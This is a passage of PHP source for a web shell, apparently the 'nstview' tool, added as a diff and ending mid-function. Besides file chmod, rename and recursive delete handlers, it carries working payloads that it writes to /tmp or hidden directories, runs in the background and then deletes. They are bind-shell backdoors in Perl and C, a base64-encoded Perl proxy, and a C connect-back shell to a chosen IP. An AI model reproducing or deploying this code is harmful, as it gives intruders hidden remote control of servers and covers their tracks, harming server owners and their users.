+<p><table cellpadding="0" cellspacing="0" border="0" bgcolor="silver"><tr><td width="100%" valign="top"><table width="100%" cellpadding="5" cellspacing="2" border="0"><tr><td width="100%" bgcolor="#008000" align="center" colspan="5"><font color="#ffffff" size="3"><b>CHMOD (File Permissions)</b></font></td></tr>
+        <tr bgcolor="gray">
+                <td align="left"><b>Permission</b></td>
+                <td align="center"><b>Owner</b></td>
+                <td align="center"><b>Group</b></td>
+                <td align="center"><b>Other</b></td>
+                <td bgcolor="#dddddd" rowspan="4"> </td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Read</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner4" value="4" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group4" value="4" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other4" value="4" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Write</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner2" value="2" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group2" value="2" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other2" value="2" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="left" nowrap><b>Execute</b></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="owner1" value="1" onclick="do_chmod('owner')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="group1" value="1" onclick="do_chmod('group')"></td>
+                <td align="center" bgcolor="#ffffff"><input type="checkbox" name="other1" value="1" onclick="do_chmod('other')"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Octal:</td>
+                <td align="center"><input type="text" name="t_owner" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_group" value="" size="1"></td>
+                <td align="center"><input type="text" name="t_other" value="" size="1"></td>
+                <td align="left"><b>=</b> <input type="text" name="t_total" value="777" size="3"></td>
+        </tr><tr bgcolor="#dddddd">
+                <td align="right" nowrap>Symbolic:</td>
+                <td align="center"><input type="text" name="sym_owner" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_group" value="" size="3"></td>
+                <td align="center"><input type="text" name="sym_other" value="" size="3"></td>
+                <td align="left" width=100><b>=</b> <input type="text" name="sym_total" value="" size="10"></td>
+        </tr>
+</table></td></tr></table></p>
+HTML;
+
+print "<center>".$chmd."
+
+<b>$d/$wich_f</b><br><br>
+<input type=submit value=CHMOD></form>
+</center>
+</form>
+";
+$t_total=$_POST['t_total'];
+if($t_total){
+chmod($d."/".$wich_f,$t_total);
+print "<center><font color=green><br><b>Now chmod is $t_total</b><br><br></font>";
+print "<a href='$php_self?d=$d'># BACK</a><br><br>";
+}
+echo $copyr;
+exit;
+}
+
+# rename
+if(@$_GET['rename']){
+print "<b><font color=green>RENAME $d/$wich_f ?</b></font><br><br>
+<center>
+<form method=post>
+<b>RENAME</b><br><u>$wich_f</u><br><Br><B>TO</B><br>
+<input name=rto size=40 value='$wich_f'><br><br>
+<input type=submit value=RENAME>
+</form>
+";
+
+@$rto=$_POST['rto'];
+
+if($rto){
+$fr1=$d."/".$wich_f;
+$fr1=str_replace("//","/",$fr1);
+$to1=$d."/".$rto;
+$to1=str_replace("//","/",$to1);
+
+rename($fr1,$to1);
+print "File <br><b>$wich_f</b><br>Renamed to <b>$rto</b><br><br>";
+
+echo "<meta http-equiv=\"REFRESH\" content=\"3;URL=".$php_self."?d=".$d."&rename=1&wich_f=".$rto."\">";
+
+}
+
+echo $copyr;
+exit;
+}
+
+
+
+
+if(@$_GET['deldir']){
+@$dir=$_GET['dir'];
+function deldir($dir)
+{
+$handle = @opendir($dir);
+while (false!==($ff = @readdir($handle))){
+if($ff != "." && $ff != ".."){
+if(@is_dir("$dir/$ff")){
+deldir("$dir/$ff");
+}else{
+@unlink("$dir/$ff");
+}}}
+@closedir($handle);
+if(@rmdir($dir)){
+@$success = true;}
+return @$success;
+}
+$dir=@$dir;
+deldir($dir);
+
+$rback=$_GET['rback'];
+@$rback=explode("/",$rback);
+$crb=count($rback);
+for($i=0; $i<$crb-1; $i++){
+        @$x.=$rback[$i]."/";
+}
+echo "<meta http-equiv=\"REFRESH\" content=\"0;URL='$php_self?d=".@$x."'\">";
+echo $copyr;
+exit;}
+
+
+if(@$_GET['t']=="tools"){
+        # unix
+if($os=="unix"){
+print "
+<center><br>
+<font color=red><b>P.S: After you Start, your browser may stuck! You must close it, and then run nstview.php again.</b><br></font>
+<table border=1>
+<tr><td align=center><b>[Name]</td><td align=center><b>[C]</td><td align=center><b>[Port]</td><td align=center><b>[Perl]</td><td align=center><b>[Port]</td><td align=center><b>[Other options, info]</td></tr>
+<tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input type=submit name=c_bd value='Start' style='background-color:green;'></td><td><input name=port size=6 value=5545></td></form><form method=post><td><input type=submit name=perl_bd value='Start' style='background-color:green;'></td><td><input name=port value=5551 size=6></td><td>none</td></form></tr>
+<tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><input type=submit value='Start' name=bc_c style='background-color:green;'></td><td><input name=port_c size=6 value=5546></td><td><input type=submit value='Start' name=port_p disabled style='background-color:gray;'></td><td><input name=port value=5552 size=6></td><td>b.c. ip: <input name=ip value='".$_SERVER['REMOTE_ADDR']."'> nc -l -p <i>5546</i></td></form></tr>
+<tr><form method=post><td><font color=red><b>Datapipe:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port_1 size=6 value=5547></td><td><input type=submit value='Start' name=datapipe_pl style='background-color:green;'></td><td><input name=port_2 value=5553 size=6></td><td>other serv ip: <input name=ip> port: <input name=port_3 value=5051 size=6></td></form></tr>
+<tr><form method=post><td><font color=red><b>Web proxy:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5548></td></form><form method=post><td><input type=submit value='Start' name=perl_proxy style='background-color:green;'></td><td><input name=port size=6 value=5554></td></form><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 4 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5549></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5555></td><td>none</td></tr>
+<tr><form method=post><td><font color=red><b>Socks 5 serv:</b></font></td><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5550></td></form><td><input type=submit value='Start' disabled style='background-color:gray;'></td><td><input name=port size=6 value=5556></td><td>none</td></tr>
+</table>
+</center>
+<br><Br>
+";
+}#end of unix
+
+
+if($_POST['perl_bd']){
+$port=$_POST['port'];
+$perl_bd_scp = "
+use Socket;\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
+setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);bind(S,sockaddr_in(\$p,INADDR_ANY));
+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("nohup /tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru("nohup .nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("nohup /tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
